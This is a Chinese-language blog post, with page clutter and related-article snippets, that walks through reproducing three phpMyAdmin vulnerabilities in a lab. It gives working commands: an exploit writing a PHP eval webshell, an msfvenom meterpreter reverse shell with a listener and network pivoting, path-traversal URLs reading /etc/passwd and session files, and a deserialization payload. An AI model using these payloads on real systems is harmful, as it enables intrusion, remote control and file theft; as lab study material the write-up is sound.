【phpmyadmin漏洞复现】CVE-2016-5734远程代码执行漏洞+CVE-2018-12613文件包含漏洞+WooYun-2016-199433反序列化漏洞

最新推荐文章于 2024-04-10 13:21:13 发布
最新推荐文章于 2024-04-10 13:21:13 发布
阅读量847 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120029546
版权

CVE-2016-5734

1.访问8080端口,用弱口令root root登录

2. 在Kali中有自带的EXP:

searchsploit phpmyadmin

3.进入该目录:/usr/share/exploitdb/exploits/php/webapps,通过EXP写入一句话木马:

python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"

4.用蚁剑连接:

5.然后通过msfvenom生成木马:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.225.133 LPORT=2333 -f elf>/root/sa.elf

6.通过蚁剑把sa.elf上传到容器的/tmp环境下,/tmp环境是临时文件目录普通用户的权限都比较大

7.接下来在Kali上开启监听

msfconsole>use multi/handler>set payload linux/x64/meterpreter/reverse_tcp>set LHOST 192.168.225.139>set LPORT 2333>run

8.然后在蚁剑的虚拟终端上运行木马,进入\tmp目录修改执行权限:chmod +x sa.elf,再执行命令:

9.Kali上就得到会话

10.然后就是查询容器的网段地址,把容器的网段地址添加到路由中:

获取内网段:

run get_local_subnets

添加内网网段:

run autoroute -s 172.18.0.0/24

打印路由信息:

run autoroute -p

11.对mysql进行探测:

回到meterpreter终端:

use auxiliary/scanner/mysql/mysql_version-> set RHOST 192.168.225.139->set THREADS 20->run

12.可以到容器中查看路由是否正确,然后可以对Mysql进行账号密码爆破,因为那个容器的密码为空 就不进行演示了:

sudo docker inspect 8f | grep IPAddress

13.这里有一个exp脚本:

python phpmyadmin_5734.py -c 'system(id);' -u root -p root -d test http://192.168.225.139:8080/

-d是已经可以写的数据库,-c是待执行的PHP语句,如果没有指定表名,这个POC会创建一个名为prgpwn的表。

CVE-2018-12613

攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外:

$cfg[‘AllowArbitraryServer’]=true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码;

$cfg[‘ServerDefault’]=0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。

1.原理:

1)利用kali自带的工具searchsploit查找漏洞:

searchsploit phpmyadmin

2.发现有两个关于4.8.1版本的文件包含漏洞,先看一下第一个内容:

cd /usr/share/exploitdb/exploits/php/webapps/&&cat 44924.txt

可以通过命令查看php文件:sudo docker exec id cat index.php

第一种方法:

1.首先在SQL那里写入并执行:

select '<?php phpinfo()?>';

2.F12找到cookie的值:

3.访问以下网址可以进行命令执行:

http://192.168.225.139:8080/server_sql.php/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_40bb979c3e05290b576e48fe0a0b3ebd

第二种方法:

1.构造payload:

http://192.168.225.139:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

WooYun-2016-199433

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码

1.访问8080端口,即可看到phpmyadmin的首页,由于vulhub环境没有连接数据库,所以此时会报错,但这个漏洞的利用与数据库无关,因此不用管

2.burpsuite抓包,刷新页面,构造payload:

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

3. 这个漏洞是不能读取php文件,因为有了eval(),相当于任意文件包含了。getshell需要包含上传的木马文件,也可以包含日志文件。但docker环境中并未开启日志功能,也没有上传点。所以不能进行getshell演示了

malloc_冲!
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpMyAdmin漏洞利用与安全防范
02-25
很多公司和个人都喜欢使用phpMyAdmin来管理MySQL数据库——在zoomeye中搜索关键字phpmyadmin,我国位居第二,如下图1所示。phpMyAdmin功能非常强大,可以执行命令,导入或者导出数据库,可以说通过phpMyAdmin可以完全操控Mysql数据库。但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、Xamp等,这些架构的默认密码为root,如果未修改密码,极易被渗透。p
漏洞复现-phpmyadmin_SQL注入 (CVE-2020-5504)
qq_58683895的博客
10-27 671
phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。路径:/pma/index.php 密码root:123456。证明有东西,应该就是首页,那网站的路径即为/var/www/html/pma。
Exploit-DB与相关本地工具的综合运用
最新发布
Kali与编程
04-10 309
例如,在进行web应用渗透时,可能先用Nmap扫描目标网络服务,再结合Burp Suite抓包分析请求响应,找出潜在漏洞点,最后在Exploit-DB中寻找适用的exploit并实施攻击。Exploit-DB作为丰富的漏洞利用资源库,与本地安全工具的紧密结合能够极大提高安全研究和渗透测试的工作效率。以Metasploit Framework为例,这是一个集成开发环境,集成了众多Exploit-DB中的exploit,并提供了图形化和命令行界面,方便用户执行和管理渗透测试任务。二、Exploit-DB简介。
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1167
phpmyadmin弱口令至getshell 漏洞复现
CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现
丶没胡子的猫
01-24 2153
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接 漏洞描述   CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5
buuctf [PHPMYADMIN]CVE-2016-5734
qq_1873822的博客
03-19 577
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,
phpmyadmin CVE-2016-5734
weixin_51692662的博客
11-03 237
phpmyadmin CVE-2016-5734
vulhub-phpmyadminCVE-2016-5734
qq_26947429的博客
07-23 567
CVE-2016-5734远程代码执行漏洞 影响版的本phpmyadmin4.3.0-4.6.2 看到phpmyadmin登陆页面爆破拿到用户名密码root,root 利用poc进行命令执行 写入一句话进行菜刀连接 python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kX
CVE-2016-5734 phpmyadmin 远程命令执行漏洞
qq_41567985的博客
09-27 387
CVE-2016-5734在exploit-db上也就是phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的4.6.x版本(直至4.6.3),4.4.x版本(直至4.4.15.7),和4.0.x版本(直至4.0.10.16)。CVE的作者利用在php5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug,使注入的代码远程执行
[CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现
https://www.cnblogs.com/zpchcbd/
08-30 644
触发原因:preg_replace函数引发的 触发原理:preg_replace漏洞触发有两个前提: 01:第一个参数需要e标识符,有了它可以执行第二个参数的命令 02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令,举个例子: 影响漏洞版本: 漏洞复现: 1、docker搭建 docker-compose up -d 2、漏洞利用代码:python php...
CVE-2016-5734远程代码执行模拟从外网进入内网
大方子
08-29 2026
【自己直接从自己的笔记中复制来的,若出现排版问题请直接查看原笔记】 文档:CVE-2016-5734远程代码执行模拟从外网?.. 链接:http://note.youdao.com/noteshare?id=fbf75e67cc1573d01982bd923ac6c179&sub=8FB1C4FA3A1A4A45BD694D18C59391B8 前言 最近学习各种漏洞,...
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
weblogic反序列化漏洞学习记录
include_voidmain的博客
10-11 953
weblogic反序列化漏洞学习记录
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2666
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
phpMyAdmin 4.8.1 本地文件包含漏洞复现
weixin_51681694的博客
04-22 427
漏洞点在根目录下的index.php中的61行target传参可任意控制,控制index.php包含任意文件上面的if条件需要满足target且为且且中黑名单:查看最后一个条件,需要返回true第一个红框定义白名单第二个红框检查文件名是否在白名单中,在则返回true第三个红框将原传入字符串从0到?前分割出来,再检查字符串是否在白名单中,在则返回true可以考虑设置字符串内容?之前的字符串为白名单,绕过过滤,可是?不能出现在文件名中最后则是利用点。
命令执行漏洞CVE-2016-5734分析
willow_liang的博客
10-17 865
命令执行漏洞 背景 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一-些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一-些外部程序。当应用需要调用- - -些外部程序时就会用到一-些执行系统命令的函数。 命令执行漏洞原理 命令执行漏洞(Command Execution)是指应用有时需要调用一些执行系统命令的函数,如: system()、 exec()、shell exec()、 eval()、 pass
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值